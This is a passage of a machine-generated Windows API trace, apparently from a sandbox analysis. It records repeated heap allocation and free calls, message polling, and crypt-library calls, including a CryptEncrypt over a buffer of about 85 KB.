lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.078] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.079] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.079] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.080] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.081] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.084] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.085] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.085] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.085] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.085] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.085] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.085] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.087] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14cd6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14ce0) returned 1 [0036.087] CharLowerBuffW (in: lpsz="byte[85217]", cchLength=0xb | out: lpsz="byte[85217]") returned 0xb [0036.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 